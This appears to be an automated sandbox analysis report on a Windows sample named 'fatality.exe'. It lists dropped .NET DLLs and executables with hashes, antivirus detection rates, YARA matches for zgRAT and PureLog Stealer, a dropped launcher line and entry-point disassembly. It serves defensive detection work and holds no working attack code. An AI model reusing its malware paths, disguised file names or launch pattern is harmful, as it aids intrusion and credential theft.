                                                                  SHA1:54919F84C7F97A8DF30EBF6FD2C0A766739F4A13
                                                                  SHA-256:8222C5C6EB4643EBA42A14077A4A82207FC4CD7E9D6ED3B19B17555BDDD5FB4B
                                                                  SHA-512:F77D7B8BB0BF2F1737986DCD1E6B5D29D39BB4D000701B7E101AEBBEF3A3A9900EE29133B7317935199AB3A6491927208FADFA16C9D7C889CE950B6CEBEE1449
                                                                  Malicious:false
                                                                  Preview:uKMYpMvKXaUsyfHXawa2NRqfb
                                                                  Process:C:\blockcomSession\mQBLhXIPAJ.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):25
                                                                  Entropy (8bit):4.323856189774724
                                                                  Encrypted:false
                                                                  SSDEEP:3:m8BycKO:nzt
                                                                  MD5:F3B9CCDC019368D3AB88FB3BD3D84CB0
                                                                  SHA1:AD09FE5B944926B30BDF40DB2D779BD77B739BB8
                                                                  SHA-256:129BBEC07BAF0C237D22A2B25E8D7FF3A8761F081050EC99FCC9C4B4D94DEAC0
                                                                  SHA-512:5DD383A367CBFC0BCBCBB79C047F3360C13B224916674A1D92C0E0DA67FA98EF0ED61713D176F5705AADBF10E4FEEA2B0CD55D54F3D9EA3C99C11AE0D5984D8C
                                                                  Malicious:false
                                                                  Preview:OnvFga5YCwEgvqLy4JwBXMYQ1
                                                                  Process:C:\blockcomSession\containerReview.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):69632
                                                                  Entropy (8bit):5.932541123129161
                                                                  Encrypted:false
                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                                  Joe Sandbox View:
                                                                  • Filename: OneDriveStandaloneUpdater.exe, Detection: malicious, Browse
                                                                  • Filename: 85D5ktqjpd.exe, Detection: malicious, Browse
                                                                  • Filename: VIyu4dC9CU.exe, Detection: malicious, Browse
                                                                  • Filename: top.exe, Detection: malicious, Browse
                                                                  • Filename: DC86.exe, Detection: malicious, Browse
                                                                  • Filename: WinPerfcommon.exe, Detection: malicious, Browse
                                                                  • Filename: Udzp7lL5ns.exe, Detection: malicious, Browse
                                                                  • Filename: loader.exe, Detection: malicious, Browse
                                                                  • Filename: hz7DzW2Yop.exe, Detection: malicious, Browse
                                                                  • Filename: 7aHY4r6vXR.exe, Detection: malicious, Browse
                                                                  Process:C:\blockcomSession\mQBLhXIPAJ.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):69632
                                                                  Entropy (8bit):5.932541123129161
                                                                  Encrypted:false
                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                                  Process:C:\blockcomSession\containerReview.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33792
                                                                  Entropy (8bit):5.541771649974822
                                                                  Encrypted:false
                                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 38%
                                                                  Process:C:\blockcomSession\containerReview.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):32256
                                                                  Entropy (8bit):5.631194486392901
                                                                  Encrypted:false
                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                                  Process:C:\blockcomSession\containerReview.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):23552
                                                                  Entropy (8bit):5.519109060441589
                                                                  Encrypted:false
                                                                  SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                  MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                  SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                  SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                  SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                  Process:C:\blockcomSession\containerReview.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):85504
                                                                  Entropy (8bit):5.8769270258874755
                                                                  Encrypted:false
                                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                                  Process:C:\blockcomSession\mQBLhXIPAJ.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):23552
                                                                  Entropy (8bit):5.519109060441589
                                                                  Encrypted:false
                                                                  SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                  MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                  SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                  SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                  SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                  Process:C:\blockcomSession\mQBLhXIPAJ.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33792
                                                                  Entropy (8bit):5.541771649974822
                                                                  Encrypted:false
                                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 38%
                                                                  Process:C:\blockcomSession\mQBLhXIPAJ.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):85504
                                                                  Entropy (8bit):5.8769270258874755
                                                                  Encrypted:false
                                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                                  Process:C:\blockcomSession\mQBLhXIPAJ.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):32768
                                                                  Entropy (8bit):5.645950918301459
                                                                  Encrypted:false
                                                                  SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                  MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                  SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                  SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                  SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 29%
                                                                  Process:C:\blockcomSession\mQBLhXIPAJ.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):32256
                                                                  Entropy (8bit):5.631194486392901
                                                                  Encrypted:false
                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                                  Process:C:\blockcomSession\containerReview.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):32768
                                                                  Entropy (8bit):5.645950918301459
                                                                  Encrypted:false
                                                                  SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                  MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                  SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                  SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                  SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 29%
                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                  File Type:MSVC .res
                                                                  Category:dropped
                                                                  Size (bytes):1224
                                                                  Entropy (8bit):4.435108676655666
                                                                  Encrypted:false
                                                                  SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                                  MD5:931E1E72E561761F8A74F57989D1EA0A
                                                                  SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                                  SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                                  SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                                  Malicious:false
                                                                  Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi
                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):4608
                                                                  Entropy (8bit):3.9511493830697266
                                                                  Encrypted:false
                                                                  SSDEEP:48:6bprPtxM7Jt8Bs3FJsdcV4MKe271d4A2UvqBHOOulajfqXSfbNtm:yPwPc+Vx9MkUvkocjRzNt
                                                                  MD5:ADE6A18F90D238D56E4B938C8A0D5BAB
                                                                  SHA1:F90DA0489CFDF8BCF10B2FB4638AD0C39310B296
                                                                  SHA-256:E7165E9F9DF4E4BA98643FC692FAC7F5B0E50C3FF54B48C1EF4E522CDE414295
                                                                  SHA-512:C6D24BD0BB93CF42471D079ED5E30490EF04D73417D25AF87F6BCCF5D52E418E6284594D1919F69F1CFF897B08D1B6E8BAE2AB43A238DD798301F5628A904A4E
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  Process:C:\Users\user\Desktop\fatality.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):89
                                                                  Entropy (8bit):5.014619947625862
                                                                  Encrypted:false
                                                                  SSDEEP:3:xDGTLz6PGKvAKa6YonqQILiM0XESLI3i9A:xDIz6PG0La6zILiMr4IS9A
                                                                  MD5:DE5B4FDE5BC10D0F76A55EB9D249AB56
                                                                  SHA1:751938B6AB03340842B429805FD2DA1AA0D8C964
                                                                  SHA-256:009AA3F866391C87BD840EFB9B6B4EB33FC4DCB625CD23E436D0C9383E033F0F
                                                                  SHA-512:58F02657DB363B742C6AEE66CCD5A6B279280E2DD09D7394B7B9907CA2CD005CD67EE88CA98D533605E30608FC61ABC6F51F7D3BE4A3813D7414D280B6F16A1F
                                                                  Malicious:false
                                                                  Preview:%ENrfyRjMcxlV%%CWcjcFQ%..%VaremYySQf%"C:\blockcomSession/containerReview.exe"%VRGeLHaFaS%
                                                                  Process:C:\Users\user\Desktop\fatality.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):236
                                                                  Entropy (8bit):5.863135001723359
                                                                  Encrypted:false
                                                                  SSDEEP:6:G/kgwqK+NkLzWbHa/JUrFnBaORbM5nCeHWfwtqbcl3TjW67:G/kBMCzWLauhBaORbQCmWYtqbclT667
                                                                  MD5:D2DD350044CE1FE408A44A036A7E6A0D
                                                                  SHA1:3597E45DEB69F4AA4749855E9ED452A39A9C7D42
                                                                  SHA-256:487BFE07ABFF347481F10C648717AAB8008C7606C026B920358544F85C25E1B2
                                                                  SHA-512:81147D83DC5FFD1ADB10ADD8486F6DAC65DF0E7C579F8244EF8F3D6F646CED97FAD3F55A178CED9B60F5F23BB77A0E29BCCB22651280A9EAE135976AF71C366A
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  Process:C:\Users\user\Desktop\fatality.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):2006016
                                                                  Entropy (8bit):7.565400810273061
                                                                  Encrypted:false
                                                                  SSDEEP:24576:Ens6R8MzM9PKio0d/wAJqc47Z9CN1rgtq1DBukkM3vCRj8Joo4ytx605H3uG2nkZ:EaocGZcrgtq1NVkMfko4u6EL29qN
                                                                  MD5:F568E43BC473CD8CEB2553C58194DF61
                                                                  SHA1:14C0FFF25EDFD186DAB91EE6BCC94450C9BED84D
                                                                  SHA-256:C91375814E8A5BB71736CE61FA429BC7B98A2B7B2A254B9967C51F3FCCFACD52
                                                                  SHA-512:47CF66CE90FECD147077C72DC3F06DB2199B9BC96E887915D6B0D4BFEA7577D60A7345DA6E5BC59967D02528FBDF6C8BF86233261338F782B9185C890FBC400E
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\blockcomSession\containerReview.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\blockcomSession\containerReview.exe, Author: Joe Security
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                                  Process:C:\blockcomSession\containerReview.exe
                                                                  File Type:ASCII text, with very long lines (682), with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):682
                                                                  Entropy (8bit):5.884418242643272
                                                                  Encrypted:false
                                                                  SSDEEP:12:P8CWavAilZBJ9McPtx+frppwK3DoMThR1OgNaox6WBVn+ziyVsqAM:P8C9jBJ9MwCx3DoMThR1OgrkAZyVaM
                                                                  MD5:F89357C623B432B41B879DB7EDC6CE66
                                                                  SHA1:983F2C8BF1EB0B8A3C459F518EC03BC3B6DE820B
                                                                  SHA-256:A13FD56225F8982E943378D3810FCE8C4150432966635A016430F0D00740C06B
                                                                  SHA-512:BD7D38ECCC025598F9C8227912D483BD011F711360FD52C7BCF10FE8AAEA81B7F3F0A863DFEF7240D65FFD9355C37BC10AC86D72F2904E3DC831A40CFBBF2545
                                                                  Malicious:false
                                                                  Process:C:\blockcomSession\containerReview.exe
                                                                  File Type:ASCII text, with very long lines (332), with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):332
                                                                  Entropy (8bit):5.8335759852953055
                                                                  Encrypted:false
                                                                  SSDEEP:6:ONpApthSfF9yTn4StUV3QXw1APIwRacELTzrx08ZIftzpE8dicISqU8fvI:wpAJoF9yEStUV3ofxRaljZyVdicbv9
                                                                  MD5:6380CB1F24A7D1FD02B9F6987C3EB779
                                                                  SHA1:4A653C30F23D5087CD481F85358DC7D29149C31A
                                                                  SHA-256:FA1DE9ABD89D952CC8CC84074CF593AA1FF340A852BE8C3314D2B495D9257095
                                                                  SHA-512:2ABAB82B49BA10FEA484D54BF374E680C33CB49A5AEB8351AC84DB80605FA13CEEFFDA27D2F5AFD331A94BDD7BAF74B736E1D7FF6BD1030E8CAF33DA39921C06
                                                                  Malicious:false
                                                                  Process:C:\blockcomSession\containerReview.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):2006016
                                                                  Entropy (8bit):7.565400810273061
                                                                  Encrypted:false
                                                                  SSDEEP:24576:Ens6R8MzM9PKio0d/wAJqc47Z9CN1rgtq1DBukkM3vCRj8Joo4ytx605H3uG2nkZ:EaocGZcrgtq1NVkMfko4u6EL29qN
                                                                  MD5:F568E43BC473CD8CEB2553C58194DF61
                                                                  SHA1:14C0FFF25EDFD186DAB91EE6BCC94450C9BED84D
                                                                  SHA-256:C91375814E8A5BB71736CE61FA429BC7B98A2B7B2A254B9967C51F3FCCFACD52
                                                                  SHA-512:47CF66CE90FECD147077C72DC3F06DB2199B9BC96E887915D6B0D4BFEA7577D60A7345DA6E5BC59967D02528FBDF6C8BF86233261338F782B9185C890FBC400E
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                                  Process:C:\Windows\System32\w32tm.exe
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):151
                                                                  Entropy (8bit):4.878512534301145
                                                                  Encrypted:false
                                                                  SSDEEP:3:VLV993J+miJWEoJ8FXAQvdXvUQdAXaNvpGTNvj:Vx993DEUpaUX
                                                                  MD5:2F989F7A3443C4A62D25BBA86BA1C41E
                                                                  SHA1:41C12A7F341CF9580BD0C524A06B0D8C8E60C542
                                                                  SHA-256:863DEBEB31D47C00BE3921205694F171ECC4F5A21B90103F574819F5659CD287
                                                                  SHA-512:ACA7992031333316AFB02CCDD1E33E23EBB74F3270B2FE69D6D4F377B75E23DB9FB6881DDDC20616F74390B945F5E5BEFA19F19074FC5A45879701EB97780E3B
                                                                  Malicious:false
                                                                  Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 13/01/2025 08:15:59..08:15:59, error: 0x80072746.08:16:04, error: 0x80072746.
                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Entropy (8bit):7.783232715391711
                                                                  TrID:
                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                  • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                  File name:fatality.exe
                                                                  File size:3'319'076 bytes
                                                                  MD5:a7040b85fc683f088f4c6e5b44052c43
                                                                  SHA1:7e3d644d1a1fb7b9bcccb6406d2e7fbd062eae66
                                                                  SHA256:b786f31f1c89c71d0510bbd32510595d9891c67db516f968261b02594a423a8d
                                                                  SHA512:e225f6f7e114690aad25e9c67460e50f5b84cc8ca87a69ba94ff63ab42415df176a3ed6c3456cddb849927604a4888b17e5e781ac97d2ba0197f9687bbb2c301
                                                                  SSDEEP:98304:hb5Nf/dq7yqKM1TcGZ6gtq1/Lko4uVa8Nb:FMyqKM1TogtqT44NNb
                                                                  TLSH:4AE5E11A56E25E77C3A4173244A3403E52A2D7363D71FB0A391F11E66803BB5DEB22B7
                                                                  Icon Hash:b2f0cc697970b124
                                                                  Entrypoint:0x418d16
                                                                  Entrypoint Section:
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                  DLL Characteristics:DYNAMIC_BASE, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:5
                                                                  OS Version Minor:1
                                                                  File Version Major:5
                                                                  File Version Minor:1
                                                                  Subsystem Version Major:5
                                                                  Subsystem Version Minor:1
                                                                  Import Hash:d89f3dcdac0c8dba11dc1162435bedbb
                                                                  Instruction
                                                                  call 00007F0B64B7E4F6h
                                                                  jmp 00007F0B64B7E30Eh
                                                                  push 0044BB60h
                                                                  push dword ptr fs:[00000000h]
                                                                  mov eax, dword ptr [esp+10h]
                                                                  mov dword ptr [esp+10h], ebp
                                                                  lea ebp, dword ptr [esp+10h]
                                                                  sub esp, eax
                                                                  push ebx
                                                                  push esi
                                                                  push edi
                                                                  mov eax, dword ptr [00466ECCh]
                                                                  xor dword ptr [ebp-04h], eax
                                                                  xor eax, ebp
                                                                  push eax
                                                                  mov dword ptr [ebp-18h], esp
                                                                  push dword ptr [ebp-08h]
                                                                  mov eax, dword ptr [ebp-04h]
                                                                  mov dword ptr [ebp-04h], FFFFFFFEh
                                                                  mov dword ptr [ebp-08h], eax
                                                                  lea eax, dword ptr [ebp-10h]
                                                                  mov dword ptr fs:[00000000h], eax
                                                                  ret
                                                                  mov ecx, dword ptr [ebp-10h]
                                                                  mov dword ptr fs:[00000000h], ecx
                                                                  pop ecx
                                                                  pop edi
                                                                  pop edi
                                                                  pop esi
                                                                  pop ebx
                                                                  mov esp, ebp
                                                                  pop ebp
                                                                  push ecx
                                                                  ret
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  add esp, 04h
                                                                  jmp 00007F0B64F43C69h
                                                                  jmp dword ptr [edx+72h]
                                                                  les eax, fword ptr [ecx-3507549Ah]
                                                                  out dx, eax
                                                                  mov byte ptr [ecx+2Dh], ch
                                                                  loope 00007F0B64B7E50Fh
                                                                  rcl dword ptr [esi], 1
                                                                  push eax
                                                                  test dword ptr [ecx-0Bh], BA12D799h
                                                                  add byte ptr [ecx], cl
                                                                  std
                                                                  jecxz 00007F0B64B7E450h
                                                                  sbb dword ptr [eax+17EA9179h], edx
                                                                  sub bh, dh
                                                                  cwde
                                                                  cmp eax, 87B8702Dh
                                                                  sub byte ptr [edi+eax-5B647B2Ch], ch
                                                                  sal ecx, 1
                                                                  xlatb
                                                                  pop ebx
                                                                  ror esi, cl
                                                                  push cs
                                                                  inc edx
                                                                  stc
                                                                  cdq
                                                                  in al, DFh
                                                                  inc ebp
                                                                  push FFFFFFFEh
                                                                  xor byte ptr [edi], dh
                                                                  sbb dl, byte ptr [edx-66AE482Ch]
                                                                  cmc
                                                                  add dh, byte ptr [esi]
                                                                  shl byte ptr [141748B7h], FFFFFFBDh
                                                                  mov sp, 47E0h
                                                                  Programming Language:
                                                                  • [ C ] VS2008 SP1 build 30729
                                                                  • [IMP] VS2008 SP1 build 30729
                                                                  Name | Virtual Address | Virtual Size | Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT | 0x2fa020 | 0x34 | cheat
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2fa054 | 0x210 | cheat
